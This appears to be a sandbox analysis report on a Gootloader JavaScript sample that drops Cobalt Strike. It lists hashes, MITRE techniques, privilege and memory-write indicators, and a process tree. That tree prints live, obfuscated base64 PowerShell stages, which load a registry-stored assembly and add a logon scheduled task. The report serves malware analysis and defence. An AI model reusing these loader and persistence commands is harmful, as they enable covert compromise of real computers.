cobaltstrike | be3da69303ecce036c309478131c3bfdc6bc2ce37a2cfd8833fd13cf0413f333

Analysis

max time kernel
150s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
06/09/2022, 12:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gootloader_payload.js
Size

507KB
MD5

87da4e714b2536ff087610bd1d85973f
SHA1

e13af717e348ec5991c8f9a5bcd97fb81c5bb011
SHA256

be3da69303ecce036c309478131c3bfdc6bc2ce37a2cfd8833fd13cf0413f333
SHA512

c3043ad057269896a95881997a0807470ab5ff6e12ca8c4e5481749196064959efea292a2a6d25f3ff69a6623c6731adf939989144021e4e768aa3acd3fea7e1
SSDEEP

6144:D7TnJm/x24+NeRdwDVPcPJwSXYlS9/kN5EJ1aKA5n9SKQoulUIoMoCVca:D7TE/xH+wRdwRPiMmkNzKABAJ1lUeVca

Score

10^/10

cobaltstrike backdoor trojan

Malware Config

Signatures

Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4904	powershell.exe
4884	powershell.exe
4904	powershell.exe
4884	powershell.exe
3144	powershell.exe
3436	powershell.exe
3436	powershell.exe
3144	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeIncreaseQuotaPrivilege	3144	powershell.exe
Token: SeSecurityPrivilege	3144	powershell.exe
Token: SeTakeOwnershipPrivilege	3144	powershell.exe
Token: SeLoadDriverPrivilege	3144	powershell.exe
Token: SeSystemProfilePrivilege	3144	powershell.exe
Token: SeSystemtimePrivilege	3144	powershell.exe
Token: SeProfSingleProcessPrivilege	3144	powershell.exe
Token: SeIncBasePriorityPrivilege	3144	powershell.exe
Token: SeCreatePagefilePrivilege	3144	powershell.exe
Token: SeBackupPrivilege	3144	powershell.exe
Token: SeRestorePrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeSystemEnvironmentPrivilege	3144	powershell.exe
Token: SeRemoteShutdownPrivilege	3144	powershell.exe
Token: SeUndockPrivilege	3144	powershell.exe
Token: SeManageVolumePrivilege	3144	powershell.exe
Token: 33	3144	powershell.exe
Token: 34	3144	powershell.exe
Token: 35	3144	powershell.exe
Token: 36	3144	powershell.exe
Token: SeIncreaseQuotaPrivilege	3144	powershell.exe
Token: SeSecurityPrivilege	3144	powershell.exe
Token: SeTakeOwnershipPrivilege	3144	powershell.exe
Token: SeLoadDriverPrivilege	3144	powershell.exe
Token: SeSystemProfilePrivilege	3144	powershell.exe
Token: SeSystemtimePrivilege	3144	powershell.exe
Token: SeProfSingleProcessPrivilege	3144	powershell.exe
Token: SeIncBasePriorityPrivilege	3144	powershell.exe
Token: SeCreatePagefilePrivilege	3144	powershell.exe
Token: SeBackupPrivilege	3144	powershell.exe
Token: SeRestorePrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeSystemEnvironmentPrivilege	3144	powershell.exe
Token: SeRemoteShutdownPrivilege	3144	powershell.exe
Token: SeUndockPrivilege	3144	powershell.exe
Token: SeManageVolumePrivilege	3144	powershell.exe
Token: 33	3144	powershell.exe
Token: 34	3144	powershell.exe
Token: 35	3144	powershell.exe
Token: 36	3144	powershell.exe
Token: SeIncreaseQuotaPrivilege	3144	powershell.exe
Token: SeSecurityPrivilege	3144	powershell.exe
Token: SeTakeOwnershipPrivilege	3144	powershell.exe
Token: SeLoadDriverPrivilege	3144	powershell.exe
Token: SeSystemProfilePrivilege	3144	powershell.exe
Token: SeSystemtimePrivilege	3144	powershell.exe
Token: SeProfSingleProcessPrivilege	3144	powershell.exe
Token: SeIncBasePriorityPrivilege	3144	powershell.exe
Token: SeCreatePagefilePrivilege	3144	powershell.exe
Token: SeBackupPrivilege	3144	powershell.exe
Token: SeRestorePrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeSystemEnvironmentPrivilege	3144	powershell.exe
Token: SeRemoteShutdownPrivilege	3144	powershell.exe
Token: SeUndockPrivilege	3144	powershell.exe
Token: SeManageVolumePrivilege	3144	powershell.exe
Token: 33	3144	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3644 wrote to memory of 4904	3644	wscript.exe	83
PID 3644 wrote to memory of 4904	3644	wscript.exe	83
PID 3644 wrote to memory of 4884	3644	wscript.exe	85
PID 3644 wrote to memory of 4884	3644	wscript.exe	85
PID 4904 wrote to memory of 3436	4904	powershell.exe	87
PID 4904 wrote to memory of 3436	4904	powershell.exe	87
PID 4904 wrote to memory of 3436	4904	powershell.exe	87
PID 4884 wrote to memory of 3144	4884	powershell.exe	88
PID 4884 wrote to memory of 3144	4884	powershell.exe	88
PID 4884 wrote to memory of 3144	4884	powershell.exe	88

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\gootloader_payload.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" MwA1ADEANAA5ADcA"OAA5ADs"A"c"w"B"sAGUAZQBwACAALQBz"A"CAAN"wA4ADsAJ"ABqA"HQ"APQBHAGUAdAAt"A"EkAdABl"A"G"0AU"ABy"A"G"8"Ac"ABl"AHIAdAB5"ACA"ALQBwAGEA"dABoA"CAAKAAiAG"gAawAiACsAI"gBjAHU"AOgBcAHMAb"wBmA"CIAKwAiAHQAdwAiA"CsA"Ig"BhA"HIAZQB"cAG0AaQBj"ACIA"KwAiAHIAb"wBzACIAK"wAiAG8AZgB0AFwAUABoAG8AbgBlAF"w"AIgArAFsARQBuA"HYAa"QByAG"8AbgB"tA"G"UA"bg"B0"AF0A"OgA6ACg"AIgB1AHM"AZQAiACs"A"IgB"y"AG"4AIgArACIAY"QBtAGU"AI"gApA"CsAIg"AwACI"A"K"QA7AG"Y"Ab"w"B"yAC"A"AKAAk"AH"MAdQBzAD0AMAA7ACQAcwB1AHM"AIAAtAGwAZ"QA"gADcAMAAwADsA"JABzAHUA"cw"ArACsAKQ"B7"AFQ"Ac"gB5"A"HsAJAB"zAG"E"AKwA9"A"C"QAagB0AC4AJABzAHUAc"wB9"AEM"AYQB0AG"MAaAB"7"AH0A"fQA7ACQAcwB"1A"H"MAPQAwAD"sAdwBo"AGkAbABlA"CgAJAB0AHIAdQBlACk"Aew"AkAHMAd"QBzA"C"sAKwA"7A"CQA"a"wBvA"D0AWwBtA"GEAdAB"oA"F"0AOgA6ACg"A"Ig"BzAHE"AIgArA"C"IAcgB0A"CIAKQAo"ACQAc"wB1A"HMAKQA7AGkAZgA"oAC"Q"AawB"vA"CA"A"LQBlAH"E"AI"AAxADAAM"AAwACkA"e"w"B"iAH"IAZQBhAGs"AfQB"9ACQAaABpA"HQAP"QAkAH"MAYQA"u"AHIAZQBwA"Gw"AYQBjA"GUAKAAiACMA"IgAs"ACQ"AawBv"ACkAOw"AkAGUAa"gB2AD"0AWwBi"AH"k"AdABlAFsAXQBdA"DoAOgAoA"C"IAbgBl"ACI"AKwAiA"H"cAI"g"A"pACgA"J"ABoAGkA"dAAuAEwAZQBuAGcAdABoAC8A"Mg"A"p"A"Ds"A"ZgBvAHIA"KAAk"A"HM"Ad"QBzAD0AMAA7ACQA"cwB1AHMAIAAtAGw"A"dAAg"AC"Q"A"aABp"AHQALgBMA"G"UA"bgBn"AHQAaA"A7AC"Q"AcwB1A"H"MAK"wA"9ADIAK"QB7AC"Q"AZ"QBqA"HYAW"w"AkAHMAd"Q"BzAC8AMgB"dAD0AWwBjAG8Ab"gB2AGUAcgB0AF0AOgA6ACgAIgBUA"G8A"QgAiACsAI"gB5AHQAZQAiACkA"KAAkAGgA"aQB"0A"C4AUwB1"A"GI"Ac"wB0AHIAaQB"uAG"cAKA"AkA"HMAdQB"z"ACwAMgApACwAKAAyA"C"oAO"AAp"A"CkAfQB"bAHIAZQBmAGwA"ZQBjAHQAa"QB"vAG4A"LgBh"A"HMAcwBlAG0"AYgBsAHk"A"XQA6ADoAKAAi"AEwA"bwAi"ACsAIgBhAGQAIgApACg"A"J"ABlAGo"AdgAp"ADsA"WwB"PAHAAZQ"B"u"AF0AOg"A6ACgA"Ig"BUAGU"AIgArACIAcw"B"0AC"IA"KQAoA"CkA"O"wA3AD"Q"ANAA0"ADk"AM"QA"3ADIAOw"A=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4904
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /e MwA1ADEANAA5ADcAOAA5ADsAcwBsAGUAZQBwACAALQBzACAANwA4ADsAJABqAHQAPQBHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAKAAiAGgAawAiACsAIgBjAHUAOgBcAHMAbwBmACIAKwAiAHQAdwAiACsAIgBhAHIAZQBcAG0AaQBjACIAKwAiAHIAbwBzACIAKwAiAG8AZgB0AFwAUABoAG8AbgBlAFwAIgArAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6ACgAIgB1AHMAZQAiACsAIgByAG4AIgArACIAYQBtAGUAIgApACsAIgAwACIAKQA7AGYAbwByACAAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAZQAgADcAMAAwADsAJABzAHUAcwArACsAKQB7AFQAcgB5AHsAJABzAGEAKwA9ACQAagB0AC4AJABzAHUAcwB9AEMAYQB0AGMAaAB7AH0AfQA7ACQAcwB1AHMAPQAwADsAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAkAHMAdQBzACsAKwA7ACQAawBvAD0AWwBtAGEAdABoAF0AOgA6ACgAIgBzAHEAIgArACIAcgB0ACIAKQAoACQAcwB1AHMAKQA7AGkAZgAoACQAawBvACAALQBlAHEAIAAxADAAMAAwACkAewBiAHIAZQBhAGsAfQB9ACQAaABpAHQAPQAkAHMAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAOwAkAGUAagB2AD0AWwBiAHkAdABlAFsAXQBdADoAOgAoACIAbgBlACIAKwAiAHcAIgApACgAJABoAGkAdAAuAEwAZQBuAGcAdABoAC8AMgApADsAZgBvAHIAKAAkAHMAdQBzAD0AMAA7ACQAcwB1AHMAIAAtAGwAdAAgACQAaABpAHQALgBMAGUAbgBnAHQAaAA7ACQAcwB1AHMAKwA9ADIAKQB7ACQAZQBqAHYAWwAkAHMAdQBzAC8AMgBdAD0AWwBjAG8AbgB2AGUAcgB0AF0AOgA6ACgAIgBUAG8AQgAiACsAIgB5AHQAZQAiACkAKAAkAGgAaQB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdQBzACwAMgApACwAKAAyACoAOAApACkAfQBbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApACgAJABlAGoAdgApADsAWwBPAHAAZQBuAF0AOgA6ACgAIgBUAGUAIgArACIAcwB0ACIAKQAoACkAOwA3ADQANAA0ADkAMQA3ADIAOwA=
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "/"e" N"AA"1ADQANQA"5A"DY"AOQ"A"x"A"D"UAO"w"AkAGMA"c"w"A9ACgAW"wB"EAG"kAYQBnAG4"A"bwBz"AHQAaQBj"AHMA"LgBQAH"IAbwB"jAGUAcwBzAF0AOgA6AEc"AZQB0AEM"A"dQByAHIAZQ"BuAH"QAUABy"AG8AYwBlA"HMAc"wAoACkALg"BNA"GEAa"QBu"AE0A"bwBkAHUAbA"BlAC4ARgBpA"GwA"ZQ"BOA"GEAbQBl"ACkAOwAkAH"YAZ"g"A9"ACIALQB3A"CAAaAAgAC8AYwAgAC"IAKwAkA"GM"AcwAr"ACIA"IAA"iA"CIA"L"wAiAC"IAZQAiACIAIAB"NAHcAQQ"Ax"AEEARAB"FAEEATg"BB"AEE"ANQBBAE"QAYwBB"A"E8A"QQ"B"BAD"UAQ"QBEAHMA"QQ"BjA"HcAQ"gBz"AEEARwBV"AEEAWgBRAEIAd"wBBAEMA"QQBBAEwAUQB"CAHoA"QQBDA"EEAQQ"B"OAHcA"Q"Q"A0A"EEARABzAEE"ASgBBA"EIAc"QB"BAE"gAUQBBAF"AAUQBC"AEgAQQBHAFUAQQBkAEEA"QQB"0"AEE"AR"Q"Br"AE"EAZABBAEIA"bABBAEcAMA"BBAF"U"AQQBCAHkAQQBHADg"AQQBjA"E"EAQgBsAEEAS"ABJAEEAZAB"BAEIANQBBAEMAQ"QBBAEwA"UQ"BCAHcAQQ"BH"AEUAQ"QBkAEE"A"QgBv"AE"E"AQwBBAEEAS"wB"BAEEAaQBBAEc"AZwBBAGE"Ad"wBBAGkAQ"QBDAH"M"AQQ"BJAGcA"QgBq"AEE"ASA"BVAEE"ATwBn"AEIA"Yw"BBAEgA"T"QBBAGIAdwBCAG"0AQ"QBD"AEkAQQB"LA"H"cAQQB"pAEE"A"SABRAEEAZAB3AEE"A"a"QBBAEMAc"wBBAE"k"AZw"BCAGg"AQQB"IAEkAQQBaAFEAQgBjAEEARwAwAEEAYQBRAEIAagBB"AEM"ASQ"BBAEsAdwBB"A"Gk"AQ"QBIAEkAQQBiAHcA"Q"gB6A"EEAQw"BJA"E"EASwB3AEEAa"QB"BAEcAOABBAFo"AZwBCADA"A"QQB"GAHcA"QQ"BVA"EE"AQg"Bv"AE"EA"RwA"4"A"EEAYgBn"AE"IAbABBAEYA"dwBBAEkAZwB"BA"HIAQ"Q"BGAHMA"QQB"SA"FEAQgB1AEEA"SAB"ZA"EEA"YQ"B"R"A"EI"A"eQ"B"B"AEcAOABBAGIAZ"w"BCAHQAQQB"HAFU"AQQBiAGc"AQ"gAw"AEEAR"gAwAEEATwBnA"EEANgBBAEMA"ZwBBAE"k"AZwBC"ADEAQQBIA"E0AQQBaA"FEA"QQBpAEEAQw"BzAEE"A"SQ"Bn"AEIAeQ"B"BAEc"ANABBAEkA"Zw"BBA"HIAQQBDAE"k"AQ"QBZAFEAQg"B0"AEEARw"B"VAEEAS"QB"nA"EEAcABBAEMAcwBBA"EkAZwBBAHcAQQBDAEk"AQ"QBLA"FEAQQA"3AEEAR"wBZAE"E"AYgB"3"AEIAe"QBBAEM"AQ"QBBAEsAQQ"BB"AGsAQ"Q"BIAE"0AQ"QBkAFE"AQg"B6AEEA"RAAwAEE"ATQBB"AEEA"NwBBAE"MAU"QBBAGMAd"wBCA"D"E"A"QQBI"AE0AQQBJAEE"AQQB0AEE"AR"wB3"AEEAWgB"RAEEAZ"wB"B"A"EQAY"wB"BAE"0AQ"QB"BA"HcAQQBEAH"MAQQBKAEEAQgB6AEEA"SA"BV"AEEAYwB"3AEEAcgBBAEMAcwBB"AEsAUQBCADcAQQBGAFEAQQB"jAGcAQgA1"A"EEASABz"AEEASgBBAEIAeg"BBAEcA"RQBB"AEsAdwBBA"DkAQQ"BDAFEAQQB"hA"GcAQ"gAwAEEAQwA0AEEA"SgBBAEI"AegBBA"EgA"VQB"B"AGMAd"wB"C"ADkAQQBFAE0A"QQBZA"F"E"AQ"gAwAEEAR"wB"NA"EEAYQB"BAEIA"NwBBA"EgAMABBAGYAU"QBBADcAQQBDAFEA"Q"QBjAH"c"AQgAxA"EEASA"BN"AEEAUABR"AEE"Adw"BBA"EQAcw"B"B"A"GQAd"wBCAG8AQ"QBHAGsAQ"Q"BiAEE"AQg"BsA"EE"AQ"wBn"AEEASgBBAEI"AM"AB"BAEgA"SQB"BAGQAUQBCAGw"AQQ"BDAGsAQQBlAHc"A"QQBr"AEEA"SA"BNAEEAZ"ABRAE"IAegB"B"AEM"Acw"BB"AEs"AdwB"BADcAQ"QBDAFEAQQB"hAHc"A"Q"g"B2AEEAR"AAwAEEAVwB3AEIA"dABB"AEcAR"QBBAG"QAQ"Q"BC"A"G"8A"QQ"B"GA"DA"AQQBPAGcA"Q"QA2AEEAQ"wBnAEEAS"QB"n"AEIAegBBAE"g"ARQBB"AE"kAZwBB"AHIAQQBDA"E"k"AQQBj"AGcAQ"gA"wAEEAQwBJA"E"EASwB"RAE"E"AbwBB"AEMA"UQ"B"B"AGMAdw"BCADEAQQBIAE0AQQ"BLAFE"AQQA3AEEAR"wBrAEE"AWgBnAEEAbwB"BAEMA"U"QBBA"GEAdwBCAHYAQQB"D"AEE"AQQB"M"AFEAQgBsA"EEASABFAEEA"SQBBAEE"AeABBAE"Q"AQ"QBBAE0"AQ"Q"BB"AHc"AQQBD"AGsA"QQ"BlAHcAQgBpAEEASABJAEEA"WgBRA"EIAaABBAE"cAc"w"BBAGYA"U"QBCAD"kAQQBDAFEA"QQBh"A"EEAQgBwAEEASABR"AEE"AUABRA"EEAawBB"AEgA"TQB"BAFkAUQBBAHUAQQBIA"E"kA"QQBaAFEA"QgB3AE"E"ARwB3AEEAWQBRA"E"IAagBBAEc"AVQBBAEsAQ"QBBAGk"AQQBDAE"0"AQQBJAGcA"QQBzAEE"AQ"wBRAEEA"YQ"B3AEIA"dgBBAEM"Aaw"BBAE8"AdwBB"AG"sA"QQBH"AFUAQ"QBhAGcAQgAyAEEA"RAAwA"EEAVwB3"AEIAaQBBA"EgAawBBAGQ"AQ"QBCAG"wAQQB"GAHMAQQ"B"YAF"E"AQgBkAE"EARABvAEEA"TwBnAEEAb"wB"BAEMASQB"BAG"IAZ"wBC"AGwAQQB"DAEkAQQ"B"LAHcA"QQBp"AEEA"SABj"AEEAS"Q"BnAE"EAcABB"AEMAZwBBAEo"AQQBCAG8AQQBHAGsAQQBkAEEAQQB1A"E"EARQB3AEEA"Wg"BRAE"IAd"QBBAEcA"YwBB"AGQAQQB"CAG"8AQ"QB"DAD"gA"QQB"NAG"cAQQ"Bw"AEE"ARA"BzAEEAWgBnAEI"AdgBBAEgASQB"BAEsA"QQBBAGsAQQBIAE0AQQBk"AF"EAQgB6"A"EE"ARAAwAEEATQB"BAE"EANwBBA"E"MAUQB"BAGMA"dwBCADEAQQB"IAE0AQQBJA"EEAQQ"B0A"EEAR"wB3"AEEAZ"ABBAEEAZwBBA"EMAUQBBAGEA"QQ"BCA"HAAQQBIAF"EA"QQBM"AGcAQgB"NAEE"A"Rw"BVAEE"AYgBnAEI"AbgB"BAEgAU"QBBAGE"AQ"Q"BBA"DcAQQBDAF"E"AQ"Q"BjA"HcAQgAxAE"EAS"ABN"AEEASwB3A"EEAO"Q"B"BAEQA"S"QBBAEsAUQB"CADcA"QQBDAFEA"Q"QBa"AFEAQgBxAE"EA"SABZAEEAV"wB"3"A"EEAawBBAE"gA"TQB"BAG"QAUQ"BCAHoAQQBDA"DgA"QQB"NAGcAQgBkAE"EA"RA"A"wAEEAVwB3AEIAagBBAE"cAOAB"BA"GIAZwBCADIAQ"QBHAFUAQQB"j"AGcAQgAwAE"EAR"g"AwAE"EATwBnAEEANg"BBAEMAZw"BBAEkAZ"wBCAFUAQQB"H"A"Dg"AQQBRAGcAQQBpAEE"AQ"wBzAE"E"A"SQBnAEIA"NQ"BBA"EgAUQBBAFo"AUQB"BAG"kAQQBDAGsAQQ"BLAEEAQQBr"AEE"ARw"BnA"E"EAYQ"BRAEIAM"ABBAEMANAB"BAFUAdwBCAD"EA"Q"QBHAEkAQQBjAH"cAQ"gAw"A"EEASABJ"AEE"AY"Q"BRAEIAdQBBA"Ec"A"Y"wBBAEsAQQ"BBAGsAQQBIAE0A"QQB"kAFEAQgB6AE"E"A"Qw"B"3A"E"EATQ"BnAEEAcAB"B"AE"M"Ad"wB"BAEsA"QQBBA"HkAQQB"D"AG8AQ"QBPAEEA"QQ"Bw"AEEAQ"wB"rAEEAZgBRAEIAYg"BBAEg"AS"QBBAF"oAUQBCA"G0A"QQBHAHc"A"QQ"BaAFEAQgBq"AEEASAB"RAE"EA"YQBRA"EIAdgB"BAEc"A"N"ABBAEwAZwBCA"GgAQQBIAE"0AQQBjAHc"AQgBsAEEARw"Aw"AEEAWQBnA"EIAc"wBBAEgAawBB"AFgAUQBBAD"Y"AQQBEAG8AQQ"BLAE"EAQQBpAEEAR"QB3AEEAYgB3A"EEAaQ"BBAEM"AcwBBAE"kA"ZwBCAG"gAQ"QB"HAF"EAQ"QB"JAGcAQ"Q"Bw"AEEA"QwB"n"AE"EASgBBAEIAbABBAEcA"bw"B"BAGQA"Z"wBBAH"AAQQBEA"H"MAQQBX"AHcAQg"B"QAEE"AS"ABBAEEAWgBRAE"IAdQBBAEYAMABBAE8AZwBBADYA"QQ"BDAGcA"QQBJ"A"GcAQgB"VAEEAR"wBVAEEASQB"n"AE"EAc"gBBAEMASQBBAG"MAdwBCADAA"QQB"DAEkAQ"QBL"AFEAQQBv"AEE"A"QwB"rAEEAT"w"B"3"AEEAMwBB"AEQ"AUQBBAE4"AQQ"BBA"DAAQQ"BE"AGsAQQBN"AFEAQQ"AzAEEA"R"ABJAE"E"ATwB"3AEEAP"Q"AiADsAJABzAG4"AaAA9"ACQA"ZQBuA"H"Y"AOgBVAFMARQB"SAE4AQQBN"A"EU"AOwBSAGUAZw"BpAHMAdABlAHIALQ"BTA"G"MAaA"B"lAGQAdQBsAGUAZA"B"UAGEAcwBrACAAJA"BzA"G"4A"a"A"A"gAC0ASQB"uA"CAAKAB"OAGUAdwAtAFM"A"YwBoA"GUA"ZA"B1A"G"wA"ZQBkAF"QAYQB"zA"GsA"IAAtAEEAYwAgA"Cg"ATgBl"AHc"ALQBTAG"MAaAB"l"AG"QA"d"QBs"AGUAZAB"UAGEAcwBrAEEA"YwB0A"G"k"Abw"BuACAALQBFAC"AAJAB"jAH"M"AI"AAtA"EEAcg"A"gA"CQAd"gBmACkA"IA"A"tA"FQ"Acg"Ag"ACgATgBlAHcALQBTAGMAaA"B"lA"GQA"d"QBsAGU"AZABU"AGE"Acw"BrA"F"QAcgB"pAGcAZw"Bl"A"HIAIAA"tAEEAdABM"ACAA"LQBV"ACAAJ"ABz"AG4"A"aAApACkAO"wA"zAD"Q"AN"w"A"y"ADQ"AMwAyADgANwA"7AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /e NAA1ADQANQA5ADYAOQAxADUAOwAkAGMAcwA9ACgAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkAOwAkAHYAZgA9ACIALQB3ACAAaAAgAC8AYwAgACIAKwAkAGMAcwArACIAIAAiACIALwAiACIAZQAiACIAIABNAHcAQQAxAEEARABFAEEATgBBAEEANQBBAEQAYwBBAE8AQQBBADUAQQBEAHMAQQBjAHcAQgBzAEEARwBVAEEAWgBRAEIAdwBBAEMAQQBBAEwAUQBCAHoAQQBDAEEAQQBOAHcAQQA0AEEARABzAEEASgBBAEIAcQBBAEgAUQBBAFAAUQBCAEgAQQBHAFUAQQBkAEEAQQB0AEEARQBrAEEAZABBAEIAbABBAEcAMABBAFUAQQBCAHkAQQBHADgAQQBjAEEAQgBsAEEASABJAEEAZABBAEIANQBBAEMAQQBBAEwAUQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEASwBBAEEAaQBBAEcAZwBBAGEAdwBBAGkAQQBDAHMAQQBJAGcAQgBqAEEASABVAEEATwBnAEIAYwBBAEgATQBBAGIAdwBCAG0AQQBDAEkAQQBLAHcAQQBpAEEASABRAEEAZAB3AEEAaQBBAEMAcwBBAEkAZwBCAGgAQQBIAEkAQQBaAFEAQgBjAEEARwAwAEEAYQBRAEIAagBBAEMASQBBAEsAdwBBAGkAQQBIAEkAQQBiAHcAQgB6AEEAQwBJAEEASwB3AEEAaQBBAEcAOABBAFoAZwBCADAAQQBGAHcAQQBVAEEAQgBvAEEARwA4AEEAYgBnAEIAbABBAEYAdwBBAEkAZwBBAHIAQQBGAHMAQQBSAFEAQgB1AEEASABZAEEAYQBRAEIAeQBBAEcAOABBAGIAZwBCAHQAQQBHAFUAQQBiAGcAQgAwAEEARgAwAEEATwBnAEEANgBBAEMAZwBBAEkAZwBCADEAQQBIAE0AQQBaAFEAQQBpAEEAQwBzAEEASQBnAEIAeQBBAEcANABBAEkAZwBBAHIAQQBDAEkAQQBZAFEAQgB0AEEARwBVAEEASQBnAEEAcABBAEMAcwBBAEkAZwBBAHcAQQBDAEkAQQBLAFEAQQA3AEEARwBZAEEAYgB3AEIAeQBBAEMAQQBBAEsAQQBBAGsAQQBIAE0AQQBkAFEAQgB6AEEARAAwAEEATQBBAEEANwBBAEMAUQBBAGMAdwBCADEAQQBIAE0AQQBJAEEAQQB0AEEARwB3AEEAWgBRAEEAZwBBAEQAYwBBAE0AQQBBAHcAQQBEAHMAQQBKAEEAQgB6AEEASABVAEEAYwB3AEEAcgBBAEMAcwBBAEsAUQBCADcAQQBGAFEAQQBjAGcAQgA1AEEASABzAEEASgBBAEIAegBBAEcARQBBAEsAdwBBADkAQQBDAFEAQQBhAGcAQgAwAEEAQwA0AEEASgBBAEIAegBBAEgAVQBBAGMAdwBCADkAQQBFAE0AQQBZAFEAQgAwAEEARwBNAEEAYQBBAEIANwBBAEgAMABBAGYAUQBBADcAQQBDAFEAQQBjAHcAQgAxAEEASABNAEEAUABRAEEAdwBBAEQAcwBBAGQAdwBCAG8AQQBHAGsAQQBiAEEAQgBsAEEAQwBnAEEASgBBAEIAMABBAEgASQBBAGQAUQBCAGwAQQBDAGsAQQBlAHcAQQBrAEEASABNAEEAZABRAEIAegBBAEMAcwBBAEsAdwBBADcAQQBDAFEAQQBhAHcAQgB2AEEARAAwAEEAVwB3AEIAdABBAEcARQBBAGQAQQBCAG8AQQBGADAAQQBPAGcAQQA2AEEAQwBnAEEASQBnAEIAegBBAEgARQBBAEkAZwBBAHIAQQBDAEkAQQBjAGcAQgAwAEEAQwBJAEEASwBRAEEAbwBBAEMAUQBBAGMAdwBCADEAQQBIAE0AQQBLAFEAQQA3AEEARwBrAEEAWgBnAEEAbwBBAEMAUQBBAGEAdwBCAHYAQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeABBAEQAQQBBAE0AQQBBAHcAQQBDAGsAQQBlAHcAQgBpAEEASABJAEEAWgBRAEIAaABBAEcAcwBBAGYAUQBCADkAQQBDAFEAQQBhAEEAQgBwAEEASABRAEEAUABRAEEAawBBAEgATQBBAFkAUQBBAHUAQQBIAEkAQQBaAFEAQgB3AEEARwB3AEEAWQBRAEIAagBBAEcAVQBBAEsAQQBBAGkAQQBDAE0AQQBJAGcAQQBzAEEAQwBRAEEAYQB3AEIAdgBBAEMAawBBAE8AdwBBAGsAQQBHAFUAQQBhAGcAQgAyAEEARAAwAEEAVwB3AEIAaQBBAEgAawBBAGQAQQBCAGwAQQBGAHMAQQBYAFEAQgBkAEEARABvAEEATwBnAEEAbwBBAEMASQBBAGIAZwBCAGwAQQBDAEkAQQBLAHcAQQBpAEEASABjAEEASQBnAEEAcABBAEMAZwBBAEoAQQBCAG8AQQBHAGsAQQBkAEEAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDADgAQQBNAGcAQQBwAEEARABzAEEAWgBnAEIAdgBBAEgASQBBAEsAQQBBAGsAQQBIAE0AQQBkAFEAQgB6AEEARAAwAEEATQBBAEEANwBBAEMAUQBBAGMAdwBCADEAQQBIAE0AQQBJAEEAQQB0AEEARwB3AEEAZABBAEEAZwBBAEMAUQBBAGEAQQBCAHAAQQBIAFEAQQBMAGcAQgBNAEEARwBVAEEAYgBnAEIAbgBBAEgAUQBBAGEAQQBBADcAQQBDAFEAQQBjAHcAQgAxAEEASABNAEEASwB3AEEAOQBBAEQASQBBAEsAUQBCADcAQQBDAFEAQQBaAFEAQgBxAEEASABZAEEAVwB3AEEAawBBAEgATQBBAGQAUQBCAHoAQQBDADgAQQBNAGcAQgBkAEEARAAwAEEAVwB3AEIAagBBAEcAOABBAGIAZwBCADIA